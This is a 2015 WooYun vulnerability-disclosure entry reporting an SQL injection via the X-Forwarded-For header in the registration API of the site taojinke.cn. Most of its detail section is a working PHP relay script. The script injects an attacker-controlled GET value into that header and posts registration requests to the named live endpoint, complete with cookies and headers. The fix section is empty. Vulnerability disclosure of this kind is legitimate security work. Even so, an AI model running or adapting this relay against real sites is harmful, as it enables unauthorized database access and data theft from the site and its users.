当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099532

漏洞标题:淘金客某站SQL注入

相关厂商:淘金客

漏洞作者: 路人甲

提交时间:2015-03-05 12:46

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入一枚

详细说明:

xff注入
注册时的问题
中转脚本

<?php
$ch=curl_init();
$xff='X-Forwarded-For:'.$_GET['s'];
$header=array('User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0 Iceweasel/33.1','Cookie: CNZZDATA5862236=cnzz_eid%3D1991157813-1417786766-%26ntime%3D1420858531; pgv_pvi=5099481088; _pk_id.1.d769=92a240ef5133cdfd.1417794017.3.1420858531.1418022458.; SERVERID=201bb2bbb94a6e7d2eee7a5cca44baa7|1420858556|1420858515; IESESSION=alive; pgv_si=s352783360; _pk_ses.1.d769=*','Accept: application/json, text/javascript, */*; q=0.01','X-Requested-With: XMLHttpRequest','Connection: keep-alive','Content-Type: application/x-www-form-urlencoded',$xff,'XDEBUG_SESSION=netbeans-xdebug; has-selected=1; banner-status=1','DNT: 1');
$url='http://www.taojinke.cn/api/user/referral-reg.php';
$name ='';
$strPol = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
$max = strlen($strPol)-1;
for($i=0;$i<13;$i++)
{
$name.=$strPol[rand(0,$max)];
}
$post_date='username='.$name.'&qq=2544145&password=b2e625336a2b0158&referral_id=10000&token=&userid=0';
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post_date);
ob_start();
$str=curl_exec($ch);
$res=ob_get_contents();
ob_end_clean();
curl_close($ch);
echo $res;
?>


QQ截图20150304201334.jpg


QQ截图20150304201351.jpg


漏洞证明:

QQ截图20150304201334.jpg


QQ截图20150304201351.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝